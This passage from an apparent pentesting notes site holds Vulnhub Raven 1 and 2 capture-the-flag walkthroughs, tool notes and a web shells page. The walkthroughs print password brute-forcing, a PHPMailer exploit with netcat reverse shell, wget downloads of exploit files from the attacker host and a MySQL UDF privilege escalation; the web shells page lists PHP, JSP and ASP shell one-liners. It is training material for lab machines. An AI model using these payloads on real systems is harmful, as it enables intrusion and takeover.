        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

        Having found anything, after testing input validations in the endpoints of the application, I'm going to try to brute force login with steven, who is the user with id=2.

        wpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

        Resulst:

        Now, we have:

        • user: steven
        • password: pink84

        These credentials are good to login into the wordpress and... retrieve flag3!!!

        Flag3 was hidden in the draft of a post. Here, in plain text:

        flag3{afc01ab56b50591e7dccf93122770cd2}\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#using-credentials-found-for-wordpress-in-a-different-service-ssh","title":"Using credentials found for wordpress in a different service (ssh)","text":"

        It's not uncommon to use same usernames and passwords across services. Wo, having found steven's password for wordpress, we may try to use the same credentials in a different service. Therefore, we will try to access port 22 (which was open) and see if these creds are valid:

        ssh steven@192.168.56.104\n

        After confirming \"fingerprinting\", we are asked to introduce steven's password, and... it works!

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#escalation-of-privileges","title":"Escalation of privileges","text":"

        We can see who we are (id), to which groups we belong (id), the version of the running server (uname -a), and which commands we are allowed to run (sudo -l). And here comes the juicy part. As you may see in the screenshot we can run the command python as root without entering a password.

        Resources: This site is a must when it comes to Unix binaries that can be used to bypass local security restrictions https://gtfobins.github.io

        In particular, we can easily spot this valid exploit: https://gtfobins.github.io/gtfobins/python/#sudo. What does it say about python? If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

        This is just perfect. So to escalate to root we just need to run:

        sudo python -c 'import os; os.system(\"/bin/sh\")'\n

        See the results:

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#getting-the-flags","title":"Getting the flags","text":"

        Printing flags now is not difficult at all:

        find . -name flag*.txt 2>/dev/null \n

        And results:

        ./var/www/flag2.txt\n./root/flag4.txt\n

        We can print them now:

        cat /var/www/flag2.txt\n
        Results:

        flag2{fc3fd58dcdad9ab23faca6e9a36e581c}\n
        cat /root/flag4.txt\n

        Results:

        ______                      \n\n| ___ \\                     \n\n| |_/ /__ ___   _____ _ __  \n\n|    // _` \\ \\ / / _ \\ '_ \\ \n\n| |\\ \\ (_| |\\ V /  __/ | | |\n\n\\_| \\_\\__,_| \\_/ \\___|_| |_|\n\n\nflag4{715dea6c055b9fe3337544932f2941ce}\n\nCONGRATULATIONS on successfully rooting Raven!\n\nThis is my first Boot2Root VM - I hope you enjoyed it.\n\nHit me up on Twitter and let me know what you thought: \n\n@mccannwj / wjmccann.github.io\n

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-and-tools","title":"Commands and tools","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
        sudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.104\ndirb http://192.168.56.104\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\necho \"192.168.56.104    local.raven\" sudo >> /etc/hosts\nwpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --user steven -t 25\nssh steven@192.168.56.104\nsudo python -c 'import os; os.system(\"/bin/sh\")'\nfind . -name flag*.txt 2>/dev/null\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#tools","title":"Tools","text":"
        • dirb.
        • netdiscover.
        • nmap.
        • wpscan.
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/","title":"Walkthrough: Raven 2, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#about-the-machine","title":"About the machine","text":"data Machine Raven 2 Platform Vulnhub url link Download https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download Mirror https://download.vulnhub.com/raven/Raven2.ova Size 765 MB Author William McCann Release date 9 November 2018 Description Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven? Difficulty Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#setting-up-the-machines","title":"Setting up the machines","text":"

        I'll be using Virtual Box.

        Kali machine (from now on: attacker machine) will have two network interfaces:

        • eth0 interface: NAT mode (for internet connection).
        • eth1 interface: Host-only mode (for attacking the victim machine).

        Raven 1 machine (from now on: victim machine) will have only one network interface:

        • eth0 interface.

        After running

        ip a\n
        we know that the attacker's machine IP address is 192.168.56.102/24.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#identify-victims-ip","title":"Identify victim's IP","text":"

        To discover the victim's machine IP, we run:

        sudo netdiscover -i eth1 -r 192.168.56.102/24\n

        These are the results:

        Usually, victim's IP is the last one listed, in this case 192.168.56.104, BUT as this lab was performed in several days, victim's machine IP will switch eventually to 192.168.56.105.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

        Now we can run a scanner to see which services are running on the victim's machine:

        sudo nmap -p- -A 192.168.56.104\n

        And the results:

        Having a web server in port 80, it's inevitable to open a browser and have a look at it. Also, at the same time, we can run a simple enumeration scan with dirb:

        dirb http://192.168.56.104\n
        By default, dirb is using /usr/share/dirb/wordlists/common.txt. The results are pretty straightforward:

        There are two folders quite appealing:

        • A wordpress installation running on the server.
        • A vendor installation with a service such as PHPMailer installed.
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#deeper-scan-with-specific-tool-for-wordpress-service-wpscan","title":"Deeper scan with specific tool for wordpress service: wpscan","text":"

        First, let's start by running a much deeper scanner with wpscan. We'll be enumerating users,

        wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

        And the results show us some interesting findings:

        Main findings:

        • XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authentication to post entries. It's also useful in wordpress for retrieving pings when a post is linked back. This means that it's also an open door for exploitation. We'll return to this lateri.
        • WordPress readme found: http://raven.local/wordpress/readme.html
        • Upload directory has listing enabled: http://raven.local/wordpress/wp-content/uploads/.
        • WordPress version 4.8.7.
        • WordPress theme in use: twentyseventeen.
        • Enumerating Users: michael, steven.

        Opening the browser in http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation. As a matter of fact, by clicking on http://192.168.56.105/wp-admin/install.php, we end up on a webpage with the source code pointing to raven.local. We need to include a redirection in our /etc/hosts file. (This is better explained in the vulnhub raven 1 machine.

        sudo nano /etc/hosts\n

        At the end of the file we add the following line:

        192.168.56.104  local.raven\n# CTRL-s  and CTRL-x\n

        There was another open folder: http://raven.local/wordpress/wp-content/uploads/. Using the browser we can get to

        And now we have flag3:

        Let's see now the user enumeration. Yoy can go to the walkthrough of the Vulnhub Raven 1 machine to see how to manually brute force users in a wordpress installation.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

        Having found anything, after testing input validations in the endpoints of the application,

        I'm going to try to brute force login with steven, who is the user with id=2.

        wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

        And also with michael:

        wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames michael -t 25\n

        No valid password is found.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#browse-listable-folders-that-are-supposed-to-be-close","title":"Browse listable folders that are supposed to be close","text":"

        Besides the wordpress installation, our dirb scan gave us another interesting folder: http://192.168.56.105/vendor. Browsing around you can find the service PHPMailer installed.

        Two insteresting findings regarding the PHPMailer service:

        One is the file PATH, with the the path to the service and other of the flags:

        In plain text:

        /var/www/html/vendor/\nflag1{a2c1f66d2b8051bd3a5874b5b6e43e21}\n

        The second is the file VERSION, that reveals that the PHPMailer service has version 5.2.16, which is potentially vulnerable,.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-the-service-phpmailer-5216","title":"Exploiting the service PHPMailer 5.2.16","text":"

        After googling \"phpmailer 5.2.16 exploit\", we have these results:

        • https://www.exploit-db.com/exploits/40974.

        What is this vulnerability about? Quoting Legalhackers:

        An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.

        When it comes to Raven 2 machine, we realize that we're using a contact form from:

        We can use the exploit from https://www.exploit-db.com/exploits/40974.

        Originally, this exploit is (highlighted the fields we're going to change):

        And this is the anarconder.py saved with execution permissions in our attacker machine (hightlighted my changes to the original script):

        We launch the script:

        python3 anarconder.py\n

        And open in listening mode port 4444 with netcat:

        nc -lnvc 4444\n

        Now, I will open in the browser http://192.168.56.105/zhell.php to get the reverse shell in my netcat conection.

        And we can browse to /var/www and get flag2.txt

        flag2.txt in plain text:

        flag2{6a8ed560f0b5358ecf844108048eb337}\n

        Also, a nice-thing-to-do on every wordpress installation is checking out for credentials in the config file (if existing). So by browsing to /var/www/html/wordpress, we can see:

        And reading the file, we can see some credentials:

        cat wp-config.php\n

        So now we also have these credentials:

        • user: root
        • password: R@v3nSecurity

        We can try to access ssh service running on port 22 with those credentials, without success. We can also try to escalate from the open shell, but we get the message that \"su root must be run from terminal\".

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#escalation-of-privileges","title":"Escalation of privileges","text":"

        First, let's see who we are (id), to which groups we belong (id), the version of the running server (uname -a), and which commands we are allowed to run (sudo -l).

        Also there are some nice tools that we could run in the victim machine if we have python installed. Let's make a comprobation:

        which python\n
        Result:

        /usr/bin/python\n

        Nice, let's proceed: There is a cool enumeration tool for linux called Linux Privilege Cheker, that we can download from the referenced github repo and serve it from our attacker machine:

        cp linuxprivchecker.py /var/www/html\ncd /var/www/html\nservice apache2 start\n

        And then, from the victim machine:

        cd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\n

        Now we can run it and see the results:

        python /tmp/linuxprivchecker.py\n

        Once you run it, you will get this enumeration of escalation exploits. Since potentially we have some root credentials for a service, we will try with the MYSQL vulnerability 4.X/5.0.

        After reviewing the exploit http://www.exploit-db.com/exploits/1518, we copy-paste the exploit and save it as 1518.c in our apache server:

        cd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n

        Compiling this C code in the victim attack gives us error.

        Then, we are going to compile in the attacker machine.

        # To creates 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n

        The file we are going to retrieve from the victim machine is 1518.so. So from /tmp in the victim machine:

        cd /tmp\nwget http://192.168.56.102/1518.so\n

        Now in the victim machine, we login into MSQL service:

        mysql -u root -p\n\n# when asked about password, we enter R@v3nSecurity\n

        We're in! Let's do some digging:

        # List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n

        Exploiting the vulnerability: we'll create a table in the database, with a column, and we will assing a value to that column that it's going to be our payload file with the extension .so.

        create table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n

        So far:

        ![Mysql capture](img(raven2-19.png)

        Now, we are going to load that file from the column to a different location, let's say /usr/lib/mysql/plugin/1518.so:

        select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n

        If we now execute:

        select do_system('chmod u+s /usr/bin/find');\nexit\n

        Now, if we check suid binaries, we can see \"find\" among them.

        Now, if we create a file, such as \"tocado\" in the /tmp folder of the victim machine and we execute 'find file -exec code', every time that the command finds the file it will execute the following code as root.

        Then, we can run:

        touch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#getting-the-flag","title":"Getting the flag","text":"

        We just need to go to the root folder:

        cd /root\nls -la\ncat flag4.txt\n

        flag4.txt in plain text:

          ___                   ___ ___ \n | _ \\__ ___ _____ _ _ |_ _|_ _|\n |   / _` \\ V / -_) ' \\ | | | | \n |_|_\\__,_|\\_/\\___|_||_|___|___|\n\nflag4{df2bc5e951d91581467bb9a2a8ff4425}\n\nCONGRATULATIONS on successfully rooting RavenII\n\nI hope you enjoyed this second interation of the Raven VM\n\nHit me up on Twitter and let me know what you thought: \n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
        ip a\nsudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.105\ndirb http://192.168.56.105\nwpscan --url http://192.168.56.105/wordpress --enumerate u --force --wp-content-dir wp-content\npython3 anarconder.py\nnc -lnvc 4444\n\ncat wp-config.php\ncd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\npython /tmp/linuxprivchecker.py\n\n\ncd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n\n# To creates 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n\nmysql -u root -p\n\n# List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n\ncreate table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n\nselect * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n\nselect do_system('chmod u+s /usr/bin/find');\nexit\n\ntouch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#tools","title":"Tools","text":"
        • dirb.
        • netdiscover.
        • nmap.
        • wpscan.
        • mysql
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"w3af/","title":"w3af","text":"

        w3af is a\u00a0Web Application Attack and Audit Framework.

        ","tags":["pentesting","web pentesting"]},{"location":"w3af/#installation","title":"Installation","text":"

        Download from: https://github.com/andresriancho/w3af.

        W3af documentation.

        ","tags":["pentesting","web pentesting"]},{"location":"wafw00f/","title":"WafW00f - A firewall scanner","text":"

        WafW00f is a web application firewall (WAF) fingerprinting tool that sends requests and analyses responses to determine if a security solution is in place.

        WAFW00F does the following:

        • Sends a\u00a0normal\u00a0HTTP request and analyses the response; this identifies a number of WAF solutions.
        • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
        • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#installation","title":"Installation","text":"

        We can install it with the following command:

        sudo apt install wafw00f -y\n
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#basic-usage","title":"Basic usage","text":"
        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"walkthroughs/","title":"Index of walkthroughs","text":"","tags":["walkthrough"]},{"location":"walkthroughs/#well-this-is-a-mess","title":"Well, this is a mess","text":"

        It feels like an eternity since I embarked on my first walkthroughs of the Overthewire game challenges. However, the reality is that this happened just one year ago (or maybe two). During those days, I was consumed by an intense obsession with documenting every single step I took. Allow me to relive and share a snippet of my explanation for progressing from level 31 to level 32 in Bandit so you can draw your own conclusions:

        Click to keep reading why this is a mess
        1. mkdir /tmp/amanda31\n2. cd /tmp/amanda31\n3. git clone ssh://bandit31-git@localhost/home/bandit31-git/repo\n4. cd repo\n\n# when listing repo, you can realize that there is a .gitignore file\n5. ls -la\n\n# Print the .gitignore file to see which changes are not being commited\n6. cat .gitignore\n\n# \"*.txt\" files are being excluded from being pushed\n7. cat README.md\n\n# README.md file will provide you with the instructions to pass the level: \"This time your task is to push a file to the remote repository.\n# Details:\n#    File name: key.txt\n#    Content: 'May I come in?'\n#    Branch: master  \"\n\n# Remove \"*.txt\" from .gitignore\"\n8. echo \"\" > .gitignore\n\n# Create a key.txt file\n9. echo \"May I come in?\" > ./.git/key.txt\n\n# Add these changes to the commit\n10. git add -A\n\n# Commit the changes in your repository. A line with the explanation of the changes may be required\n11. git commit\n\n# Push the changes to the server\n12. git push\n\n# In the results of the git push commands, the server will \n# provide the password for the next level.\n

        Smile on my face. I even commented what \"git push\" or \"cat file.txt\" were executing! XDDDDDDDD

        I also vividly remember spending A LOT of time doing this. But you know what? I don't care what my colleagues say. All that time was completely worthwhile because it helped me integrate that knowledge into my tired brain. Take, for instance, the walkthrough of vulnhub Goldeneye 1. It took me a while to format and prepare it for sharing (and I did it with the intention of sharing).

        Now things have changed. I don't do that anymore. I've become selfish. My walkthroughs have transformed into a list of steps linked to tools, tags and concise explanations, solely for the purpose of helping me remember that machine. They are probably only useful to me (not suitable for LinkedIn hahaha).

        Anyway, at some point, I needed to make this decision. More labs and self-centered documentation? Or more detailed walkthroughs and fewer labs (and consequently falling behind on my goals)? More labs, geee!

        All of this is just to say that in this repository, you will find incredibly detailed walkthroughs (even with multiple ways of exploiting a machine) along with quick guides containing raw commands. All of them together and for no reason. Please, bear with me!

        ","tags":["walkthrough"]},{"location":"walkthroughs/#updated-list-of-walkthroughs-writeups","title":"Updated list of walkthroughs - writeups","text":"
        • Vulnhub GoldenEye 1
        • Vulnhub Raven 1
        • Vulnhub Raven 2
        • HTB appointment
        • HTB archetype
        • HTB bank
        • HTB base
        • HTB crocodile
        • HTB explosion
        • HTB friendzone
        • HTB funnel
        • HTB included
        • HTB ignition
        • HTB lame
        • HTB markup
        • HTB metatwo
        • HTB mongod
        • HTB nibbles
        • HTB nunchucks
        • HTB omni
        • HTB oopsie
        • HTB pennyworth
        • HTB photobomb
        • HTB popcorn
        • HTB redeemer
        • HTB responder
        • HTB sequel
        • HTB support
        • HTB tactics
        • HTB trick
        • HTB undetected
        • HTB unified
        • HTB usage
        • HTB vaccine
        ","tags":["walkthrough"]},{"location":"waybackurls/","title":"waybackurls","text":"

        waybackurls inspects back URLs saved by Wayback Machine and look for specific keywords.

        ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#installation","title":"Installation","text":"
        go install github.com/tomnomnom/waybackurls@latest\n
        ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#basic-usage","title":"Basic usage","text":"
        waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
        ","tags":["pentesting","reconnaissance","tools"]},{"location":"web-services/","title":"Pentesting web services","text":"","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-web-applications","title":"Web services vs. Web applications","text":"
        • Interoperability: Web services promote interoperability by providing a standardized way for applications to communicate. They rely on open standards like HTTP, XML, SOAP, REST, and JSON to ensure compatibility.
        • Platform-agnostic: Web services are not tied to a specific operating system or programming language. They can be developed in various technologies, making them versatile and accessible.
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-apis","title":"Web services vs. APIs","text":"

        Web services and APIs (Application Programming Interfaces) are related concepts in web development, but they have distinct differences. Web services are a broader category of technologies used to enable machine-to-machine communication and data exchange over the internet. They encompass various protocols and data formats. APIs, on the other hand, are a set of rules and tools that allow developers to access the functionality or data of a service, application, or platform.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#implementation-of-web-services","title":"Implementation of web services","text":"

        Web service implementations refer to the different ways in which web services can be created, deployed, and used. There are several methods and technologies available for implementing web services.

        • SOAP (Simple Object Access Protocol): SOAP is a protocol for exchanging structured information in the implementation of web services. SOAP-based web services use XML as their message format and can be implemented using various programming languages.
        • JSON-RPC and XML-RPC: JSON-RPC and XML-RPC are lightweight protocols for remote procedure calls (RPC) using JSON or XML, respectively. These are simpler alternatives to SOAP for implementing web services.
        • REST (Representational State Transfer): REST is an architectural style for designing networked applications, and it uses HTTP as its communication protocol.
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#xml-rpc","title":"XML-RPC","text":"
        • XML-RPC (Extensible Markup Language - Remote Procedure Call) created in 1998, is a protocol and a set of conventions for encoding and decoding data in XML format and using it for remote procedure calls (RPC).
        • It is a simple and lightweight protocol for enabling communication between software applications running on different systems, often over a network like the internet.
        • XML-RPC has been used as a precursor to more modern web service protocols like SOAP and REST.
        • It works by sending HTTP requests that call a single method implemented on the remote system.
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#json-rpc","title":"JSON-RPC","text":"
        • JSON-RPC (Remote Procedure Call) is a remote procedure call (RPC) protocol encoded in JSON (JavaScript Object Notation).
        • Like XML-RPC, JSON-RPC enables communication between software components or systems running on different machines or platforms.
        • JSON-RPC is known for its simplicity and ease of use and has become popular in web development and microservices architectures.
        • JSON-RPC is very similar to XML-RPC, however, it is usually used because it provides much more human-readable messages and takes less data to for communication.
        • JSON-RPC allows a client to invoke methods or functions on a remote server by sending a JSON object that specifies the method to call and its parameters.
        • The message sent to invoke a method is a request with a single object serialized using JSON. It has three properties:
          • method: name of the method to invoke
          • params: an array of objects to pass as arguments
          • id: request ID used to match the responses/requests
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#soap","title":"SOAP","text":"

        SOAP (Simple Object Access Protocol) is a protocol for exchanging structured information in the implementation of web services. It is a protocol that defines a set of rules and conventions for structuring messages, defining remote procedure calls (RPC), and handling communication between software components over a network, typically the internet.

        SOAP is seen as the natural successor to XML-RPC and is known for its strong typing and extensive feature set, which includes security, reliability, and transaction support.

        SOAP Web Services may also provide a Web Services Definition language (WSDL) declaration that specifies how they may be used or interacted with.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#rest-restful-apis","title":"REST (RESTful APIs)","text":"

        REST, which stands for Representational State Transfer, is an architectural style for designing networked applications. It is not a protocol or technology itself but rather a set of principles and constraints that guide the design of web services and APIs (Application Programming Interfaces).

        REST is widely used for building scalable, stateless, and easy-to-maintain web services/APIs that can be accessed over the internet. REST web services generally use JSON or XML, but any other message transport format like plain-text can be used.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-language-fundamentals","title":"WSDL Language Fundamentals","text":"

        WSDL, which stands for Web Services Description Language, is an XML-based language used to describe the functionality and interface of a web service, typically, SOAP-based web services (Simple Object Access Protocol).

        Versions: At the time of writing, WSDL can be distinguished in two main versions: 1.1 and 2.0. Although 2.0 is the current version, many web services still use WSDL 1.1.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-wsdl-document","title":"The WSDL Document","text":"

        A WSDL document is typically created to describe a SOAP-based web service. It defines the service's operations, their input and output message structures, and how they are bound to the SOAP protocol.

        First of all, it is important to know that WSDL documents have abstract and concrete definitions:

        • Abstract: describes what the service does, such as the operation provided, the input, the output and the fault messages used by each operation
        • Concrete: adds information about how the web service communicates and where the functionality is offered

        The WSDL document effectively documents the API provided by the service. The WSDL document serves as a contract between the service provider and consumers. It specifies how clients should construct SOAP requests to interact with the service. This contract defines the operations, their input parameters, and expected responses.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-components","title":"WSDL components","text":"
        • Types: The <types> section defines the data types used in the web service. It typically includes XML Schema Definitions (XSD) that specify the structure and constraints of input and output data.
        • Message: The <message> element defines the data structures used in the messages exchanged between the client and the service. Messages can have multiple parts, each with a name and a type definition referencing the types defined in the <types> section.
        • Port Type: The <portType> element describes the operations that the web service supports. Each operation corresponds to a method or function that a client can invoke. It specifies the input and output messages for each operation. The operation object defined within a port type, represents a specific action that a service can perform. It specifies the name of the operation, the input message structure, the output message structure, and, optionally, fault messages that can occur during the operation.
        • Binding: The <binding> element specifies how the service operations are bound to a particular protocol, such as SOAP over HTTP. It defines details like the protocol, message encoding, and endpoint addresses.
        • Service: The <service> element provides information about the service itself. It includes the service's name and its endpoint address, which is the URL where clients can access the service.

        Instead of portType, WSDL v. 2.0 uses interface elements which define a set of operations representing an interaction between the client and the service. Each operation specifies the types of messages that the service can send or receive.

        Unlike the old portType, interface elements do not point to messages anymore (it does not exist in v. 2.0). Instead, they point to the schema elements contained within the types element

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-service-security-testing","title":"Web Service Security Testing","text":"

        Web service security testing is the process of evaluating the security of web services to identify vulnerabilities, weaknesses, and potential threats that could compromise the confidentiality, integrity, or availability of the service or its data.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#information-gathering-and-analysis","title":"Information Gathering and Analysis","text":"

        1. Identify the SOAP web services that need to be tested.

        2. Identify the WSDL file for the SOAP web service.

        Once the SOAP service has been identified, a way to discover WSDL files is by appending ?wsdl,.wsdl, ?disco or wsdl.aspx to the end of the service URL:

        3. With WSDL document identified we may gather information about the web service endpoints, operations, and data exchanged.

        4. Understand the security requirements, authentication methods, and authorization mechanisms in place.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#authentication-and-authorization-testing","title":"Authentication and Authorization Testing","text":"

        Invoke hidden methods

        • Test the authentication mechanisms in place (e.g., username/password, tokens) to ensure they prevent unauthorized access.
        • Verify that users are correctly authenticated and authorized to access specific operations and resources.
        • Input Validation Testing:
          • Test for input validation vulnerabilities, such as SQL injection, cross-site scripting (XSS), and XML-based attacks.

        • Send malicious input data to the web service's input parameters to identify potential security weaknesses. For instance, command injection attacks:

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-soapaction-header","title":"The SOAPAction header","text":"

        The SOAPAction header is a transport protocol header (either HTTP or JMS). It is transmitted with SOAP messages, and provides information about the intention of the web service request, to the service. The WSDL interface for a web service defines the SOAPAction header value used for each operation. Some web service implementations use the SOAPAction header to determine behavior.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-shells/","title":"Web shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

        Preconfigured webshells in Kali linux

        Go to /usr/share/webshells/

        Other resources

        See reverse shells

        A Web Shell is typically a web script that accepts our command through HTTP request parameters, executes our command, and prints its output back on the web page.

        A web shell script is typically a one-liner that is very short and can be memorized easily.

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#some-basic-web-shells","title":"Some basic web shells","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#php","title":"php","text":"
        <?php system($_REQUEST[\"cmd\"]); ?>\n
        • Pentesmonkey webshell.
        • WhiteWinterWolf webshell.
        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#jsp","title":"jsp","text":"
        <% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>\n
        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#asp","title":"asp","text":"
        <% eval request(\"cmd\") %>\n
        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#how-to-exploit-a-web-shell","title":"How to exploit a web shell","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#file-upload-vs-remote-code-execution","title":"File upload vs Remote code execution","text":"

        1. FILE UPLOAD: By abusing an upload feature. We would place this web shell script into the remote host's web directory to execute the script through the web browser.

        2. REMOTE CODE EXECUTION: By writting our one-liner shell to the webroot to access it over the web. This would be if onle have remote command execution as a exploit vector. Here an example for bash:

        echo '<?php system($_REQUEST[\"cmd\"]); ?>' > /var/www/html/shell.php\n

        So, for the second way of exploitation, it's relevant to identify where the webroot is. The following are the default webroots for common web servers:

        Web Server Default Webroot Apache /var/www/html/ Nginx /usr/local/nginx/html/ IIS c:\\inetpub\\wwwroot\\ XAMPP C:\\xampp\\htdocs\\","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#accessing-the-web-shell","title":"Accessing the web shell","text":"

        We can access to the web shell using the browser. Or Curl:

        curl http://SERVER_IP:PORT/shell.php?cmd=id\n

        A benefit of a web shell is that it would bypass any firewall restriction in place, as it will not open a new connection on a port but run on the web port on 80 or 443, or whatever port the web application is using.

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#tools","title":"Tools","text":"

        About webshells.

        Laudanum

        nishang

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"webdav-wsgidav/","title":"WsgiDAV: A generic and extendable WebDAV server","text":"

        A generic and extendable WebDAV server written in Python and based on WSGI.

        ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#installation","title":"Installation","text":"

